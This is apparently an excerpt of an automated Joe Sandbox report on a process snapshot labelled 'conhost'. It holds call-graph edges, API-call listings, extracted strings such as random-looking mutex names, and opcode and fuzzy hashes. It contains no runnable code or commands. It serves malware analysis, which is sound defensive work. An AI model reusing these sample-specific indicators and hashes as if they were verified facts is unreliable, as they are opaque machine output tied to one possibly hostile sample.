2571->2572 2573 140001521 2572->2573 2574 140001394 2 API calls 2573->2574 2575 140001530 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000153f 2576->2577 2578 140001394 2 API calls 2577->2578 2579 14000154e 2578->2579 2580 140001394 2 API calls 2579->2580 2581 14000155d 2580->2581 2582 140001394 2 API calls 
2581->2582 2583 14000156c 2582->2583 2584 140001394 2 API calls 2583->2584 2585 14000157b 2584->2585 2586 140001394 2 API calls 2585->2586 2587 14000158a 2586->2587 2588 140001394 2 API calls 2587->2588 2589 140001599 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015a8 2590->2591 2592 140001394 2 API calls 2591->2592 2593 1400015b7 2592->2593 2594 140001394 2 API calls 2593->2594 2595 1400015c6 2594->2595 2596 140001394 2 API calls 2595->2596 2597 1400015d5 2596->2597 2598 140001394 2 API calls 2597->2598 2599 1400015e4 2598->2599 2600 140001394 2 API calls 2599->2600 2601 1400015f3 2600->2601 2601->2227 2601->2234 2603 1400014e5 2602->2603 2604 140001394 2 API calls 2602->2604 2605 140001394 2 API calls 2603->2605 2604->2603 2606 1400014ef 2605->2606 2607 1400014f4 2606->2607 2608 140001394 2 API calls 2606->2608 2609 140001394 2 API calls 2607->2609 2608->2607 2610 1400014fe 2609->2610 2611 140001503 2610->2611 2612 140001394 2 API calls 2610->2612 2613 140001394 2 API calls 2611->2613 2612->2611 2614 14000150d 2613->2614 2615 140001394 2 API calls 2614->2615 2616 140001512 2615->2616 2617 140001394 2 API calls 2616->2617 2618 140001521 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001530 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000153f 2621->2622 2623 140001394 2 API calls 2622->2623 2624 14000154e 2623->2624 2625 140001394 2 API calls 2624->2625 2626 14000155d 2625->2626 2627 140001394 2 API calls 2626->2627 2628 14000156c 2627->2628 2629 140001394 2 API calls 2628->2629 2630 14000157b 2629->2630 2631 140001394 2 API calls 2630->2631 2632 14000158a 2631->2632 2633 140001394 2 API calls 2632->2633 2634 140001599 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015a8 2635->2636 2637 140001394 2 API calls 2636->2637 2638 1400015b7 2637->2638 2639 140001394 2 API calls 2638->2639 2640 1400015c6 2639->2640 2641 140001394 2 API calls 2640->2641 2642 1400015d5 2641->2642 2643 140001394 2 API calls 2642->2643 2644 
1400015e4 2643->2644 2645 140001394 2 API calls 2644->2645 2646 1400015f3 2645->2646 2646->2250 2648 140001394 2 API calls 2647->2648 2649 14000158a 2648->2649 2650 140001394 2 API calls 2649->2650 2651 140001599 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015a8 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015b7 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015c6 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015d5 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015e4 2660->2661 2662 140001394 2 API calls 2661->2662 2663 1400015f3 2662->2663 2663->2250 2665 140001394 2 API calls 2664->2665 2666 1400015b7 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400015c6 2667->2668 2669 140001394 2 API calls 2668->2669 2670 1400015d5 2669->2670 2671 140001394 2 API calls 2670->2671 2672 1400015e4 2671->2672 2673 140001394 2 API calls 2672->2673 2674 1400015f3 2673->2674 2674->2250 2676 140001394 2 API calls 2675->2676 2677 140001530 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000153f 2678->2679 2680 140001394 2 API calls 2679->2680 2681 14000154e 2680->2681 2682 140001394 2 API calls 2681->2682 2683 14000155d 2682->2683 2684 140001394 2 API calls 2683->2684 2685 14000156c 2684->2685 2686 140001394 2 API calls 2685->2686 2687 14000157b 2686->2687 2688 140001394 2 API calls 2687->2688 2689 14000158a 2688->2689 2690 140001394 2 API calls 2689->2690 2691 140001599 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015a8 2692->2693 2694 140001394 2 API calls 2693->2694 2695 1400015b7 2694->2695 2696 140001394 2 API calls 2695->2696 2697 1400015c6 2696->2697 2698 140001394 2 API calls 2697->2698 2699 1400015d5 2698->2699 2700 140001394 2 API calls 2699->2700 2701 1400015e4 2700->2701 2702 140001394 2 API calls 2701->2702 2703 1400015f3 2702->2703 2703->2250 2705 140001394 2 API calls 2704->2705 2706 140001431 2705->2706 2707 140001394 2 API calls 2706->2707 2708 140001440 2707->2708 2709 140001394 
2 API calls 2708->2709 2710 14000144f 2709->2710 2711 140001394 2 API calls 2710->2711 2712 14000145e 2711->2712 2713 140001394 2 API calls 2712->2713 2714 14000146d 2713->2714 2715 140001394 2 API calls 2714->2715 2716 14000147c 2715->2716 2717 140001394 2 API calls 2716->2717 2718 14000148b 2717->2718 2719 140001394 2 API calls 2718->2719 2720 14000149a 2719->2720 2721 140001394 2 API calls 2720->2721 2722 1400014a9 2721->2722 2723 140001394 2 API calls 2722->2723 2724 1400014b8 2723->2724 2725 140001394 2 API calls 2724->2725 2726 1400014c7 2725->2726 2727 140001394 2 API calls 2726->2727 2728 1400014d6 2727->2728 2729 1400014e5 2728->2729 2730 140001394 2 API calls 2728->2730 2731 140001394 2 API calls 2729->2731 2730->2729 2732 1400014ef 2731->2732 2733 1400014f4 2732->2733 2734 140001394 2 API calls 2732->2734 2735 140001394 2 API calls 2733->2735 2734->2733 2736 1400014fe 2735->2736 2737 140001503 2736->2737 2738 140001394 2 API calls 2736->2738 2739 140001394 2 API calls 2737->2739 2738->2737 2740 14000150d 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001512 2741->2742 2743 140001394 2 API calls 2742->2743 2744 140001521 2743->2744 2745 140001394 2 API calls 2744->2745 2746 140001530 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000153f 2747->2748 2749 140001394 2 API calls 2748->2749 2750 14000154e 2749->2750 2751 140001394 2 API calls 2750->2751 2752 14000155d 2751->2752 2753 140001394 2 API calls 2752->2753 2754 14000156c 2753->2754 2755 140001394 2 API calls 2754->2755 2756 14000157b 2755->2756 2757 140001394 2 API calls 2756->2757 2758 14000158a 2757->2758 2759 140001394 2 API calls 2758->2759 2760 140001599 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015a8 2761->2762 2763 140001394 2 API calls 2762->2763 2764 1400015b7 2763->2764 2765 140001394 2 API calls 2764->2765 2766 1400015c6 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015d5 2767->2768 2769 140001394 2 API calls 2768->2769 2770 1400015e4 
2769->2770 2771 140001394 2 API calls 2770->2771 2772 1400015f3 2771->2772 2772->2250 2774 140001394 2 API calls 2773->2774 2775 140001440 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000144f 2776->2777 2778 140001394 2 API calls 2777->2778 2779 14000145e 2778->2779 2780 140001394 2 API calls 2779->2780 2781 14000146d 2780->2781 2782 140001394 2 API calls 2781->2782 2783 14000147c 2782->2783 2784 140001394 2 API calls 2783->2784 2785 14000148b 2784->2785 2786 140001394 2 API calls 2785->2786 2787 14000149a 2786->2787 2788 140001394 2 API calls 2787->2788 2789 1400014a9 2788->2789 2790 140001394 2 API calls 2789->2790 2791 1400014b8 2790->2791 2792 140001394 2 API calls 2791->2792 2793 1400014c7 2792->2793 2794 140001394 2 API calls 2793->2794 2795 1400014d6 2794->2795 2796 1400014e5 2795->2796 2797 140001394 2 API calls 2795->2797 2798 140001394 2 API calls 2796->2798 2797->2796 2799 1400014ef 2798->2799 2800 1400014f4 2799->2800 2801 140001394 2 API calls 2799->2801 2802 140001394 2 API calls 2800->2802 2801->2800 2803 1400014fe 2802->2803 2804 140001503 2803->2804 2805 140001394 2 API calls 2803->2805 2806 140001394 2 API calls 2804->2806 2805->2804 2807 14000150d 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001512 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001521 2810->2811 2812 140001394 2 API calls 2811->2812 2813 140001530 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000153f 2814->2815 2816 140001394 2 API calls 2815->2816 2817 14000154e 2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000155d 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000156c 2820->2821 2822 140001394 2 API calls 2821->2822 2823 14000157b 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000158a 2824->2825 2826 140001394 2 API calls 2825->2826 2827 140001599 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015a8 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015b7 2830->2831 2832 140001394 2 API 
calls 2831->2832 2833 1400015c6 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015d5 2834->2835 2836 140001394 2 API calls 2835->2836 2837 1400015e4 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015f3 2838->2839 2839->2250

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        [Callgraph: the rendered graph was not preserved in extraction and its node and edge list is omitted here. Nodes are named Function_<address> (e.g. Function_0000000140001000, Function_0000000140003150); the string-helper nodes (Function_0000000140001404, Function_0000000140001422 and their neighbours) share the single callee Function_0000000140001394, which in turn calls Function_0000000140005A10 and Function_0000000140005CC0.]

                                                        Control-flow Graph

                                                        APIs
                                                        • NtCreateMutant.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CreateMutant
                                                        • String ID:
                                                        • API String ID: 2492398971-0
                                                        • Opcode ID: 338254b652d1f69ed292fc4e3228e560f2da0ce6d728233ecdced76f20a0a8d5
                                                        • Instruction ID: 4e445467e272a21999d15bea06999aa8a42ee3ae41e0c55491b319eca22205ce
                                                        • Opcode Fuzzy Hash: 338254b652d1f69ed292fc4e3228e560f2da0ce6d728233ecdced76f20a0a8d5
                                                        • Instruction Fuzzy Hash: B2F09DB2608B408AEA12DB52F89179A77A0F38D7C0F009919BBC853735DB38C190CB40

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        [Control-flow graph of 1400026e0 (basic blocks 1400026e0 to 140002ef4): the rendered graph was not preserved in extraction and its block and edge list is omitted here. Blocks call wcsncmp, wcscpy, wcscat, wcslen and the internal functions 140002660, 140001370, 140005a00, 14000145e, 1400014a9, 1400014c7, 1400014e5, 1400014f4, 140001503, 140001512 and 14000155d.]
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: wcslen$wcscatwcscpywcsncmp
                                                        • String ID: 0$X$\BaseNamedObjects\tjkmqfhdesvsjfcufdzrlppc$`
                                                        • API String ID: 597572034-1218434000
                                                        • Opcode ID: c6e2e1af014e3208bb83af523ed93f01407971df75aa3d8bd0ede48e4dac1971
                                                        • Instruction ID: 887ae4b9209bec19cb5235481eeaaa4e09af4edbdf33f5227ea0a563a76ab627
                                                        • Opcode Fuzzy Hash: c6e2e1af014e3208bb83af523ed93f01407971df75aa3d8bd0ede48e4dac1971
                                                        • Instruction Fuzzy Hash: CE1248B2618BC081E762CB16F8443EAB7A4F789794F414215EBA957BF5EF78C189C700

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: cc25f1b0c6b2393d005b809a42414e1e0315373ab1d0073d8fdcdf459b008827
                                                        • Instruction ID: 0e586463d4a4ca50f61cc9045132e744ecc11ae356de15d822631b56ec325e6b
                                                        • Opcode Fuzzy Hash: cc25f1b0c6b2393d005b809a42414e1e0315373ab1d0073d8fdcdf459b008827
                                                        • Instruction Fuzzy Hash: 2E5113B1611A4085FB16EF27F9947EA27A1AB8D7D0F449121FB8E873B2DE38C4958300

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        [Control-flow graph of 140001ba0 (basic blocks 140001ba0 to 140001d38): the rendered graph was not preserved in extraction and its block and edge list is omitted here. Blocks call VirtualQuery, VirtualProtect, memcpy, GetLastError and the internal functions 1400023b0, 1400024d0 and 140001d40.]
                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 03d641028e8cbeedac7629b6a89e77fc92f16b8d443fb953fe453dc5cecd47d0
                                                        • Instruction ID: 81f24f74ba40ea54e773ea797397bff52108e8205f0ae1895b42fd95fa22bf35
                                                        • Opcode Fuzzy Hash: 03d641028e8cbeedac7629b6a89e77fc92f16b8d443fb953fe453dc5cecd47d0
                                                        • Instruction Fuzzy Hash: A24143F1601A4586FA26DF47F884BE927A0E78DBC4F594126EF0E877B1DA38C586C700

                                                        Control-flow Graph: function at 140002104 (graph rendering omitted)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 419951eec1e063c074906488a0681e11fdea5c088cbca47dd5ee791b47c177bd
                                                        • Instruction ID: b55cfd7427ebe33fae719129041132b8d8d412dbafadbc2bbdeb5cc16496c8e3
                                                        • Opcode Fuzzy Hash: 419951eec1e063c074906488a0681e11fdea5c088cbca47dd5ee791b47c177bd
                                                        • Instruction Fuzzy Hash: 2F21DFB1715A0292FA5BEB53F9487E923A0B76CBD0F444021FB1A476B4DB7A8986C300

                                                        Control-flow Graph: function at 140001e10 (graph rendering omitted)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 415efaae1520b6f9fe484d79ced22b069f4398e0d9568833d411c36de98fbb96
                                                        • Instruction ID: a97a33345abad997c7365aea4558d8e558d1aedc686b805e44c1795157921826
                                                        • Opcode Fuzzy Hash: 415efaae1520b6f9fe484d79ced22b069f4398e0d9568833d411c36de98fbb96
                                                        • Instruction Fuzzy Hash: FA2159B1A0110682FA77DA1BF5943FA1182ABCD7E4F258535BF19473F9DF3C88828241

                                                        Control-flow Graph: function at 140005a10 (graph rendering omitted)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: malloc
                                                        • String ID: \BaseNamedObjects\vnhmosoipghhk$dui7$dui7
                                                        • API String ID: 2803490479-772770072
                                                        • Opcode ID: 086f83d8c03b088d3742c86a81c4697aa14e2b73602f8399a692014a8352197d
                                                        • Instruction ID: c36a21544361166d9b38344f78d67b760febe83a9d66ae41515e7ed9e4a17036
                                                        • Opcode Fuzzy Hash: 086f83d8c03b088d3742c86a81c4697aa14e2b73602f8399a692014a8352197d
                                                        • Instruction Fuzzy Hash: 7C71CEB27106508BE756EF26A444BAB37A0F38EBD9F485214FF46577A1EB34D8808B41

                                                        Control-flow Graph: function at 140001880 (graph rendering omitted)
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                        • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                                        Control-flow Graph: function at 140001800 (graph rendering omitted)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: f428f08e538914ca59def88db24ae18b893fca962c9c6f5a7a89ebfa17fbcd3a
                                                        • Instruction ID: e63b84dda4a6b6d332679af638f805f5fe9510bc58595bd3c76ad6bd03a5dd0b
                                                        • Opcode Fuzzy Hash: f428f08e538914ca59def88db24ae18b893fca962c9c6f5a7a89ebfa17fbcd3a
                                                        • Instruction Fuzzy Hash: A3F06271A14A4482E612EB6AB9417E96360E75D7C1F509211FF4D576A5DF3CD1828310

                                                        Control-flow Graph: function at 14000219e (graph rendering omitted)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                        • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200